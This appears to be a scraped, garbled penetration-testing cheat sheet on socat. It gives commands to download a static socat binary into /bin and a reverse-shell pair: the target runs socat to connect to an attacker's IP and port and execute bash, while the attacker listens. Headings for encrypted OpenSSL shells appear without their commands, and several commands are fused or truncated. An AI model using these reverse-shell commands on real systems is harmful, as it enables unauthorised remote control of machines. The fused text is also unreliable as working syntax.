socat
$ curl https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/socat?raw=true --output /bin/socat$ wget https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/socat?raw=true -O /bin/socatHosting the binary on a publicly accessible attacker-controlled machine
Reverse shell
Target machine (initiate revere shell connection)
$ socat tcp:[attacker_ip]:[attacker_port] EXEC:"bash -liAttacker machine (listening)
$ socat tcp-l:[listen_port] -Best reverse shell experience
Encrypted shell with OpenSSL
Reverse shell
Connect from the target machine
Stable encrypted reverse shell
Last updated